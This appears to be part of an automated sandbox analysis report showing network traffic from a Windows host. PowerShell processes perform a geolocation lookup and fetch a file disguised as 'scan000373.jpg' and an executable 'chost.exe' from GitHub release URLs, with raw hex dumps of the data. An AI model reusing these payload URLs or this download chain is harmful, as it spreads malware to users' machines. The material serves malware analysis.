                                                                                                                                                                                                                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                                                                                                                                                                                                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-228.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.228"}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.44973020.233.83.1454435216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-05 18:36:17 UTC221OUTGET /newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/ HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                      Host: github.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      2024-12-05 18:36:18 UTC961INHTTP/1.1 302 Found
                                                                                                                                                                                                                                      Server: GitHub.com
                                                                                                                                                                                                                                      Date: Thu, 05 Dec 2024 18:36:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                                      Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/891167481/a56faf23-5067-4d66-b5a8-66cbc7b403dc?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183617Z&X-Amz-Expires=300&X-Amz-Signature=05af9abbcf2fda6397f14df92d9672e21ed149afb39203f4783b988b05380976&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dscan000373.jpg&response-content-type=application%2Foctet-stream
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                      2024-12-05 18:36:18 UTC3380INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.449731185.199.109.1334435216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-05 18:36:19 UTC647OUTGET /github-production-release-asset-2e65be/891167481/a56faf23-5067-4d66-b5a8-66cbc7b403dc?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183617Z&X-Amz-Expires=300&X-Amz-Signature=05af9abbcf2fda6397f14df92d9672e21ed149afb39203f4783b988b05380976&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dscan000373.jpg&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                      Host: objects.githubusercontent.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      2024-12-05 18:36:19 UTC846INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 51099
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 21:08:36 GMT
                                                                                                                                                                                                                                      ETag: "0x8DD08DE55AFE8D3"
                                                                                                                                                                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      x-ms-request-id: f3b5a4a0-e01e-000d-19d0-3a2981000000
                                                                                                                                                                                                                                      x-ms-version: 2024-08-04
                                                                                                                                                                                                                                      x-ms-creation-time: Tue, 19 Nov 2024 21:08:36 GMT
                                                                                                                                                                                                                                      x-ms-blob-content-md5: CN8yPIXHPp05dW7SNEvAWg==
                                                                                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                                                                                      x-ms-lease-state: available
                                                                                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=scan000373.jpg
                                                                                                                                                                                                                                      x-ms-server-encrypted: true
                                                                                                                                                                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                      Fastly-Restarts: 1
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Age: 195
                                                                                                                                                                                                                                      Date: Thu, 05 Dec 2024 18:36:19 GMT
                                                                                                                                                                                                                                      X-Served-By: cache-iad-kiad7000036-IAD, cache-ewr-kewr1740021-EWR
                                                                                                                                                                                                                                      X-Cache: HIT, HIT
                                                                                                                                                                                                                                      X-Cache-Hits: 39, 0
                                                                                                                                                                                                                                      X-Timer: S1733423780.781007,VS0,VE17
                                                                                                                                                                                                                                      2024-12-05 18:36:19 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 07 a8 05 be 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff c4 00 21 10 01 01 01 01 01 00 03 01 01 01 01 01 01 00 00 00 00 01 11 12 02 21 31 61 03 41 13 81 51 04 ff c4 00 17 01 01 01 01 01 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: JFIFHHC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"!!1aAQ
                                                                                                                                                                                                                                      2024-12-05 18:36:19 UTC1378INData Raw: b9 fd 01 ec 9e da ed e4 9f d1 b9 fd 05 7a 3a 5e 9e 79 fd 17 fe 9f a2 3b f4 9d 38 ff 00 d3 f5 3b fd 15 db a4 ed c6 ff 00 46 2f f4 07 7b ed 8b ed c3 d7 f4 62 ff 00 51 1e 9e cf fa 3c 77 fa fe 93 fb 7e 83 db 3d b5 3d bc 5e 7f af eb a4 fe 82 bd 93 d2 f4 f2 cf e8 dc f6 0e fa bd 38 76 76 83 bf 49 ae 5d a7 64 1d ba 35 c7 b3 bf d2 0e bd 1d 39 76 76 0e ba 74 e5 d9 d8 3a f4 74 e5 da 76 41 db a3 a7 1e ce c1 db a3 a7 1e ce c1 db a5 e9 c3 fe 8b ff 00 40 76 e8 e9 c7 b5 ec 1d 74 d7 2e ff 00 57 a0 74 d3 5c fa 4e c8 3a f4 74 e5 df ea 76 41 d7 4d 72 ec ec 83 ae 9a e5 d9 d9 07 5d 35 cb b2 fb 20 e9 ac f4 e7 7d b3 7d fe 83 af 49 d3 85 fe 8c ff 00 d1 47 a7 b5 e9 e5 ff 00 a3 5e 7f a0 3d 53 d2 cf 4f 3c f7 fa dc f6 0e da bf fa e5 3d 2f 48 3a 69 ac 74 74 0d 8c 75 fa 74 0d e8 e7 d1
                                                                                                                                                                                                                                      Data Ascii: z:^y;8;F/{bQ<w~==^8vvI]d59vvt:tvA@vt.Wt\N:tvAMr]5 }}IG^=SO<=/H:ittut
                                                                                                                                                                                                                                      2024-12-05 18:36:19 UTC1378INData Raw: 00 00 00 00 00 00 28 22 8a 20 08 80 00 22 85 10 51 6a 20 a1 44 5c 04 aa 00 00 02 28 00 a0 00 a0 80 00 3a 00 db 40 00 00 20 2a 7f a0 02 08 69 a9 6b 37 d2 8b 6c 4d 62 fa c6 6f b1 5d 2d 8c da e7 7d b3 7d 83 76 b3 6c 62 ff 00 46 2f b4 1d 2a 31 da 74 90 74 46 7a 5e 93 c8 0c df 49 7d 1e 55 bd 59 5c 6f b3 b5 88 f4 cf 4e 93 d3 c7 3f a3 a4 fe 8d 41 eb 9e 9b 95 e5 9e db 9f d3 e0 1e 8e 8d 71 9f d1 7f e8 0e d3 d1 d3 8f 6b d8 3b 74 74 e3 da f6 0e bd 1d 39 76 74 0e ba 74 e7 d7 c2 74 0e 9a 6b 9d f6 9d 83 af 49 6b 9f 69 d8 37 ba cd 67 a3 a0 2c 4b e5 7a 4d 04 e4 e5 7a 3a 06 79 39 5d 34 0e 4e 4d 86 a0 72 72 bd 26 81 c9 c9 d1 a0 b8 61 d1 d0 18 98 74 9d 02 e1 89 d2 74 0d 61 8c f4 bd 03 58 98 9d 1d 01 89 ca f4 68 a9 ca cf 06 b5 28 24 f2 72 dc 8b 80 e7 c3 37 cb b5 8c d8 0e 37
                                                                                                                                                                                                                                      Data Ascii: (" "Qj D\(:@ *ik7lMbo]-}}vlbF/*1ttFz^I}UY\oN?Aqk;tt9vtttkIki7g,KzMz:y9]4NMrr&attaXh($r77
                                                                                                                                                                                                                                      2024-12-05 18:36:19 UTC1378INData Raw: 83 96 26 3a f2 72 0e 72 35 1b e5 67 91 58 c2 c7 4e 4e 44 72 e4 e5 d7 93 91 5c 6c 4c 76 e5 39 11 cb 16 46 f9 5e 41 98 b9 5a e5 71 15 81 ae 4e 41 95 5e 5a 90 19 31 ac 5c 07 34 c7 5e 52 c0 72 a8 eb 7c a7 20 cf 97 48 92 35 20 05 5c 4a 83 3a ba 8b 80 31 5b 4b 14 72 ac d7 4b e5 9e 41 95 5e 4e 44 45 d5 e4 e4 19 d4 ad f2 9c 83 95 47 4b e5 9e 54 23 b7 87 39 e5 d3 cc 07 6f 35 d7 cb 8f 98 eb e5 9d 56 e5 5d 41 05 d1 04 1a d3 59 01 ad 35 90 1a d3 59 50 5d 56 54 15 59 8a 82 80 00 0a 80 08 a0 02 25 15 15 00 00 00 14 01 40 00 00 00 01 40 44 22 90 00 00 74 01 b5 00 00 00 00 00 a2 50 4a cd 6a b3 54 66 c6 79 6a d4 d0 63 0e 5a 01 8e 53 96 c0 63 93 96 81 13 95 9e 55 60 a7 27 2d 28 8c 72 70 d8 0e 7c 2f 0d 82 b1 c2 f2 d2 fc 03 1c af 2d 69 a0 cf 27 2a 02 72 72 ba 02 72 72 a0 13
                                                                                                                                                                                                                                      Data Ascii: &:rr5gXNNDr\lLv9F^AZqNA^Z1\4^Rr| H5 \J:1[KrKA^NDEGKT#9o5V]AY5YP]VTY%@@D"tPJjTfyjcZScU`'-(rp|/-i'*rrrr
                                                                                                                                                                                                                                      2024-12-05 18:36:19 UTC1378INData Raw: f5 01 c7 d5 72 b5 db d4 d7 2b e4 19 d5 9a 72 d4 f2 0d 4a d4 bf 29 3c b5 20 2c ad 4a ce 2e 03 5a 6a 20 16 a6 ae 33 40 d4 be 8c 4b 01 2d 4d 5c 4c 03 5a 95 9c 58 0d ca d4 f4 c4 58 0e 93 d1 d3 31 41 ad 35 90 1a d4 e9 10 12 fa 72 f5 e9 bf 4e 5e 94 73 f5 e9 8e 96 c6 79 54 59 5d 7c d7 2f 3e 5d 7c f9 15 d3 cd 74 95 ce 46 e2 0e 93 d2 f4 c2 a0 74 97 d2 25 05 eb f4 e9 90 1b e8 e9 80 1d 3a 5e 9c d4 1b e9 9b e9 12 83 37 d3 1d 1e 98 11 b9 eb f5 b9 e9 c6 37 01 da 7a 6b a7 28 d4 07 5e 97 a7 30 57 4e 92 fa 60 06 fa 3a 63 41 1b e9 a9 e9 ca 2e 83 a7 49 d3 3a 84 1a e8 e9 80 1d 67 a6 e5 71 9f 6e 9e 53 47 69 5b 72 f2 e9 05 68 00 00 00 00 00 10 01 00 00 00 10 00 14 01 49 f4 a7 f8 00 a9 14 46 c0 6d 40 00 00 00 00 00 11 9b 1b 40 62 c4 c7 44 c5 1c f9 4e 5d 70 c0 72 e4 e5 d7 0c 07
                                                                                                                                                                                                                                      Data Ascii: r+rJ)< ,J.Zj 3@K-M\LZXX1A5rN^syTY]|/>]|tFt%:^77zk(^0WN`:cA.I:gqnSGi[rhIFm@@bDN]pr
                                                                                                                                                                                                                                      2024-12-05 18:36:19 UTC1378INData Raw: 50 80 00 28 0b 82 06 00 00 0a 15 15 10 00 50 05 88 00 28 00 80 00 00 00 00 00 00 02 a0 00 a0 08 00 00 00 00 28 00 80 00 00 00 00 8a 22 80 a8 b0 00 00 8a 8a 23 60 36 a0 6a 02 88 08 00 00 02 88 25 a0 a9 ac da 9d 28 de 9a c7 47 40 de ae b9 f4 74 0e 9a 6b 1d 1d 03 7a 31 d2 74 0e 9a ae 5d 2f 40 e9 ab ae 7a bd 03 a6 9a c7 4b a0 d4 ab ac 6a ee 83 4a ce ac 41 44 51 44 56 6d f8 54 35 35 2d 62 fa 06 fa 35 cb a4 ed 47 5e 92 d7 3e 93 a0 6e d6 6b 3d 25 f4 0b 59 4b 4d 05 4c 34 d0 30 c3 4d d0 4c 4b 15 2d 06 6c 73 b3 e5 d2 b3 41 ce a6 35 51 45 8d f9 8c cf b7 4f 31 05 f3 1b 90 f3 1b 91 15 9e 53 1d 73 e1 9b 10 72 b1 9a e9 5c fd 28 86 b3 6b 37 d2 a3 ae 9a e5 d1 d2 8e 9a cd 4d 35 15 9c 4c 68 03 cf 97 49 19 8d c4 1a 91 79 58 d4 88 31 c9 cb ae 1c 83 97 2c df 2e f8 cd 80 e1 63
                                                                                                                                                                                                                                      Data Ascii: P(P(("#`6j%(G@tkz1t]/@zKjJADQDVmT55-b5G^>nk=%YKML40MLK-lsA5QEO1Ssr\(k7M5LhIyX1,.c
                                                                                                                                                                                                                                      2024-12-05 18:36:19 UTC1378INData Raw: 9c 5c 5c 50 49 17 17 04 11 31 a1 46 6c 66 f9 74 4c 07 3b e5 9b e5 d7 13 01 cb 84 e5 db 13 3f 0a 39 70 9c bb 61 c9 47 1e 53 87 6b e5 39 fc 28 e5 c2 f0 eb cf e1 85 1c b9 39 75 c8 72 51 cb 83 87 5c 30 a3 97 27 2e 98 60 ae 7c a7 2e b8 98 0c 72 bc b5 8a 83 38 b8 b8 60 26 18 b8 60 33 89 8d e1 ff 00 80 c7 29 cb a2 60 31 ca 72 e9 86 14 73 e4 e5 bc 30 a3 9f 29 cb ae 1c ad 1c 79 39 75 c3 0a 31 3c b5 22 e2 a0 86 28 09 82 e0 83 38 58 d7 fe 0a 31 89 7c b7 86 03 9f 2c f2 ed 89 85 1c b9 4e 5d 70 cf c2 8e 5c a7 2e d8 98 51 cb 93 97 5c 4c 28 e7 c9 cb a6 26 14 63 93 1b 0a 39 f2 cd f2 eb 89 61 47 1b e5 39 75 b1 31 46 27 9f 97 4f 33 13 1a 80 d4 69 22 b2 0b 80 00 04 50 31 50 41 70 c5 10 c5 c3 10 41 70 11 05 01 05 c4 c0 30 c3 0c 04 c1 40 41 40 44 b1 ac 4c 06 2c 66 c7 4c 4b e4
                                                                                                                                                                                                                                      Data Ascii: \\PI1FlftL;?9paGSk9(9urQ\0'.`|.r8`&`3)`1rs0)y9u1<"(8X1|,N]p\.Q\L(&c9aG9u1F'O3i"P1PApAp0@A@DL,fLK
                                                                                                                                                                                                                                      2024-12-05 18:36:20 UTC1378INData Raw: 1d 39 f4 74 0d f4 97 d3 16 b3 7d 03 af 47 4e 37 d1 d0 3b 6a f4 e5 3d 2c f4 0e ba 6b 9c f4 ba 0d ea 6b 3a 97 d0 37 a9 b1 8e 93 a4 1d 35 75 cf a5 d5 1a d4 b5 35 8f 54 17 d7 a6 6f a7 3f 5e 98 be be 41 db b6 a7 a7 9f a6 a7 a0 7a 27 a6 ba 71 9e 9a e8 1d 34 d8 c7 49 d2 0e 9b 0d 73 9e 8e 94 74 d8 74 e7 d1 7d 20 df 49 d3 9f 49 d0 3a f4 bd 38 f4 b3 d0 3b 4b 17 5c 67 a6 ba 07 4d 4b 59 d4 b4 16 d6 2f a4 f5 e9 cb d7 a0 75 e8 9e 9c 3b 59 ec 1e 99 e9 75 c2 7a 6e 7a 07 5d 35 8e 8e 81 bd 46 7a 34 15 13 a6 6f a1 5b d3 5c fa 3a 07 44 67 a3 a1 16 b3 4b e9 8b e8 1a d5 d8 e3 d2 cf 40 ed 2c 6e 38 cf 4d ca 0e 93 ed 58 95 67 a0 6c 67 4e 81 a3 58 e8 e8 56 f4 d6 3a 3a 06 f4 d6 3a 3a 41 bd 35 8e 8e 81 ad 4b 59 be 99 be 97 05 b5 9b e9 9b e9 cf d7 b1 1d 7b 3a 79 fb 6a 7b fd 51 e8 9e
                                                                                                                                                                                                                                      Data Ascii: 9t}GN7;j=,kk:75u5To?^Az'q4Istt} II:8;K\gMKY/u;Yuznz]5Fz4o[\:DgK@,n8MXglgNXV::::A5KY{:yj{Q
                                                                                                                                                                                                                                      2024-12-05 18:36:20 UTC1378INData Raw: ae f2 fc b5 ae 72 b4 c8 7a ac 5a b7 e9 8b 54 4b 53 7f 59 b7 e5 35 47 49 5b 95 c6 57 4f 37 e5 07 69 5a 63 cb 71 04 b1 cf d3 7e ab 9f a0 62 fd b3 bf a7 aa c5 aa 37 bf a9 6f eb 3a 9a a3 7b fa 6b 1a 4a 0e 92 ba 79 72 f2 eb e5 07 4f 2d b1 1b 64 5c 5c 04 0c 30 5f 80 4c 31 41 53 0c 50 19 b1 33 f1 b0 47 3e 57 96 cc 06 79 31 ac 05 67 0c fc 68 c0 63 3f 0c 6b 0c 11 9c 2c 6a c4 c1 58 cf c3 3f 1b c3 01 cf 95 e7 f1 ac 5c 85 18 cf c4 be 5d 3e 0f 80 73 e4 e5 bc 5c 28 c7 2b 3c b4 61 46 70 c6 84 a3 38 63 5f 02 8c e7 e1 9f 8d 18 94 63 3f 0c fc 6f 02 8e 7c ae 7e 37 89 85 19 cf c4 e5 bc 30 a3 9d f2 97 cb ae 26 2d 1c 6f 94 e3 f1 db 3f 0e 4a 38 f1 f8 b3 ce 3a f2 62 51 cf 93 3f 1d 30 c1 1c f3 f0 cf c6 f0 c2 8c 67 e1 9f 8d e1 80 cf 27 3f 8d 62 e0 33 c9 9f 8d e0 0c e2 e2 e2 8a 2a
                                                                                                                                                                                                                                      Data Ascii: rzZTKSY5GI[WO7iZcq~b7o:{kJyrO-d\\0_L1ASP3G>Wy1ghc?k,jX?\]>s\(+<aFp8c_c?o|~70&-o?J8:bQ?0g'?b3*
                                                                                                                                                                                                                                      2024-12-05 18:36:20 UTC1378INData Raw: a1 34 00 34 d4 00 05 00 00 05 00 00 05 04 15 12 80 00 02 88 00 2a 05 10 00 01 15 04 10 00 01 45 80 20 00 a0 00 00 00 00 00 00 00 00 00 00 28 82 22 89 a0 2a 00 00 2a a8 8b a8 82 00 00 02 e9 a8 00 00 00 00 00 00 02 88 a0 00 00 1a 00 80 28 00 06 82 06 80 3d 00 3a 05 4a 25 fb 10 45 bf 49 51 50 00 11 6a 08 8c d6 99 15 9a 8b 50 19 b1 2f 96 d1 47 2b e1 9e 1d f1 9c 07 1e 0e 1d b1 70 1c a7 86 a7 87 49 e5 64 06 27 93 97 49 14 1c b9 4e 5d 70 07 1e 57 87 4c 5c 07 2e 1a 9e 5d 31 64 06 67 97 49 08 d4 41 64 6e 31 17 45 69 59 d0 1a 19 d3 41 ad 44 d3 41 44 d3 41 46 77 0d 06 b5 13 4d 11 44 f8 3e 3f f8 2a 89 f0 01 40 00 00 2a 05 04 4d 35 9b 54 2d 4e 99 b5 8b e8 1d 35 65 71 e9 67 a0 76 95 75 ca 7a 6b 41 bd 4b e9 9d 66 fa 06 fa 66 fa 62 fa 67 a0 75 e9 7a 71 e9 7a 07 6d 35 cf
                                                                                                                                                                                                                                      Data Ascii: 44*E ("**(=:J%EIQPjP/G+pId'IN]pWL\.]1dgIAdn1EiYADADAFwMD>?*@*M5T-N5eqgvuzkAKffbguzqzm5


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      2192.168.2.44973220.233.83.145443280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-05 18:36:26 UTC204OUTGET /newpro008/poh21/releases/download/hu23/chost.exe/ HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                      Host: github.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      2024-12-05 18:36:27 UTC956INHTTP/1.1 302 Found
                                                                                                                                                                                                                                      Server: GitHub.com
                                                                                                                                                                                                                                      Date: Thu, 05 Dec 2024 18:36:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                                      Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/896881501/caceb723-d9ae-4751-b7b0-81b8adcb2786?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183627Z&X-Amz-Expires=300&X-Amz-Signature=33a7a3fb3cd6638665d2dc4c91930814d62f43cc4ea961c8a1ca69c047be325d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchost.exe&response-content-type=application%2Foctet-stream
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                      2024-12-05 18:36:27 UTC3379INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      3192.168.2.449733185.199.109.133443280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-05 18:36:28 UTC642OUTGET /github-production-release-asset-2e65be/896881501/caceb723-d9ae-4751-b7b0-81b8adcb2786?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183627Z&X-Amz-Expires=300&X-Amz-Signature=33a7a3fb3cd6638665d2dc4c91930814d62f43cc4ea961c8a1ca69c047be325d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchost.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                      Host: objects.githubusercontent.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      2024-12-05 18:36:29 UTC794INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 8652434
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Last-Modified: Sun, 01 Dec 2024 14:46:15 GMT
                                                                                                                                                                                                                                      ETag: "0x8DD1216E8819A8C"
                                                                                                                                                                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      x-ms-request-id: 7e86654e-801e-000b-1d01-441a3e000000
                                                                                                                                                                                                                                      x-ms-version: 2024-08-04
                                                                                                                                                                                                                                      x-ms-creation-time: Sun, 01 Dec 2024 14:46:15 GMT
                                                                                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                                                                                      x-ms-lease-state: available
                                                                                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=chost.exe
                                                                                                                                                                                                                                      x-ms-server-encrypted: true
                                                                                                                                                                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                      Fastly-Restarts: 1
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Age: 704
                                                                                                                                                                                                                                      Date: Thu, 05 Dec 2024 18:36:29 GMT
                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100152-IAD, cache-ewr-kewr1740068-EWR
                                                                                                                                                                                                                                      X-Cache: HIT, HIT
                                                                                                                                                                                                                                      X-Cache-Hits: 14, 0
                                                                                                                                                                                                                                      X-Timer: S1733423789.181524,VS0,VE20
